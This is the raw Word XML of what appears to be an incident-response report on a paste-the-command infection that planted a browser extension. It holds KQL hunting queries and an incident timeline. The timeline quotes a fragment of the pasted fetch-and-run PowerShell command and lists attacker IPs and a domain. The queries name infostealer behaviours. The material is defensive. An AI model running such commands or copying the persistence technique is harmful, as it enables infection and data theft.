          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. .NET binaries with outbound connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">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Find Microsoft-signed .NET compilers and utilities that should not be connecting to the internet.</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("csc.exe", "ilasm.exe", "MSBuild.exe",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"RegAsm.exe", "InstallUtil.exe", "AddInProcess.exe")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ActionType, InitiatingProcessFileName,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InitiatingProcessCommandLine, RemoteIP, RemotePort, RemoteUrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">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ilasm.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with no arguments (only its path), child of the hidden PowerShell, connects over HTTP to 31.56.19.29:80. Blocked by reputation: this is the event that triggered the only alert.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Public IP check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">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Detect non-browser processes querying IP geolocation services, the typical “hello” of infostealers.</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RemoteUrl has_any ("ipinfo.io", "ip-api.com", "api.ipify.org",</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"ifconfig.me", "checkip.amazonaws.com")</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"firefox.exe", "brave.exe", "opera.exe")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InitiatingProcessFileName,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InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">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On the third execution, PowerShell queries </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipinfo.io</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and one second later resolves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smashshape.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (behind Cloudflare) and connects over 443. No block, no alert.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Browser profile modified by another process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">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Detect a process that is not the browser writing the Chrome or Edge preferences file, where extensions are registered. It does not filter on ActionType: Chrome and Edge save these files through a temporary file they then rename, and Defender records that as FileRenamed.</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DeviceFileEvents</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FolderPath contains @"\User Data\"</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FileName in~ ("Preferences", "Secure Preferences")</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"setup.exe", "GoogleUpdater.exe", "updater.exe")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ActionType, InitiatingProcessFileName,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InitiatingProcessCommandLine, FolderPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">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csc.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with no arguments (probable injection) modifies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…\Chrome\User Data\Default\Secure Preferences</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: it registers the extension and recalculates the signature that protects it. Documented false positives: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mscopilot.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (its own profile) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="188038"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msedgewebview2.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> launched by Google Drive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Next hunt: extension outside the browser (draft)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Search the whole fleet for extension files created by a process that is not the browser.</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DeviceFileEvents</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ActionType == "FileCreated"</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FileName =~ "manifest.json" and FolderPath contains @"\AppData\"</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"setup.exe", "GoogleUpdater.exe", "updater.exe")</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InitiatingProcessFileName, FolderPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pending execution. This is the new hypothesis this hunt leaves behind. Expect noise from applications that keep their own manifest.json in AppData (Electron apps, editor extensions): document it as an exclusion before turning the query into a rule.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">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11wnj43fcr1z" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">APPENDIX C: INCIDENT TIMELINE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Times relative to the first paste (T+0:00), based on Defender for Endpoint telemetry (UTC).</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300"/>
        <w:gridCol w:w="4729"/>
        <w:gridCol w:w="2000"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1000"/>
            <w:gridCol w:w="1300"/>
            <w:gridCol w:w="4729"/>
            <w:gridCol w:w="20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16A">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T+</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6B">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">UTC</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6C">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="e6e6e6" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Status in the EDR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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0:00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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12:28:33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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pastes the command into Win+R: explorer.exe writes RunMRU and launches PowerShell with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="188038"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">irm 1450003207/511</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0:03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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserv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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The console hides itself (probable cause of the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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0:05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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12:28:38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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MSI downloaded from 86.109.75.7.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0:07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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12:28:40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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">msiexec installs silently and launches a hidden PowerShell.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0:22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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12:28:55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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">csc.exe, with no arguments, modifies Secure Preferences: persistence in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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12:28:59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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
